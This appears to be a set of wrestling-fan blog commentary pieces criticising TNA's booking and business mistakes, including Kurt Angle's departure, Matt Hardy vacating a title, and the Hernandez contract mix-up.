That’s quite the shock but causes an even bigger question: how in the world are they going to fill in two hours on Impact now? The roster was thing as it is and now they have two former World Champions gone? I know we say this a lot but they’re in even bigger trouble than they were before.

I know they have TV again and all that good stuff, but these are the kinds of things that make TNA look lame. I get that the tour is probably coming very soon, but there’s always something screwing them up and it makes TNA look like they have no idea what they’re doing from day to day. That got old a long time ago.

Meaning it’s now on Tuesday nights. Pop TV used to be the TV Guide Channel and airs Paragon Pro Wrestling. TNA is still alive but these channels aren’t exactly jumping through the roof. Once they’re canceled by these guys in a year, I’m sure they’ll keep sticking around because that’s the way my life works.

The story goes that Ethan Carter III got an injunction saying that Matt didn’t win the title fairly and would be barred from appearing on Impact for a month. Therefore the fans aren’t going to be treated fairly and Matt isn’t cool with that, so he’s vacated the title so he can appear on the show.
I know TNA has a history of making Bound For Glory mean nothing but now they’re not even making it to their next TV show. This is the show people want around so much???

1. Most importantly, Angle’s health. His body is a wreck and he needs to just go sit at home and relax. There’s no need to destroy yourself over and over in a wrestling ring. Go train Olympic wrestlers or something, but stay out of the ring.
2. TNA relies WAY too much on Angle. I get that he’s awesome and one of the best ever, but one of the major things holding TNA back over the years has been going back to Sting and/or Angle instead of building up many new talents. With Angle gone (and assuming the company survives), they have to put it on someone new. Or Jeff Hardy because he has star power. Not that the star power does much for them but he does in fact have it.

I’ve supported TNA for a long time and want them to survive, but this is into the so bad it’s funny territory.

So this time, Hernandez, who had been appearing on Lucha Underground, said he was free to sign with TNA and appear on their shows. Apparently though, no one in TNA MADE A SIMPLE PHONE CALL to find out if this was true or not. Therefore, when Hernandez appeared recently on Impact, he was a Lucha Underground talent, meaning TNA could be in trouble.
Now this wouldn’t be a major problem for most wrestling companies since it was just a few shows, but since TNA has managed to go back to the Disney taping era of WCW, Hernandez is featured a lot going forward, meaning TNA has to scrap all that footage. This means that his BDC teammates are screwed too, because they can’t edit Hernandez out of the footage so none of those guys are going to be on TV either. Word is the shows will be edited to feature stuff from Slammiversary until new footage can be shot.
HOW DO THEY KEEP DOING THIS??? TNA makes some of the most boneheaded moves I’ve ever seen in wrestling and they just never stop. I get that mistakes happen. I make them every single day, but TNA keeps making these major errors that cost them time, money, good will and the shreds of credibility they have left. Now MVP and the BDC are sitting out because TNA screwed up with this contract situation (and over freaking HERNANDEZ? A one note power guy who could have been almost any other bruiser?) and the whole thing is yet another mess that their supporters will laugh off while the rest of the audience just shakes their heads.
I know these are dark times for TNA, but it was worth looking at some of the good times too.
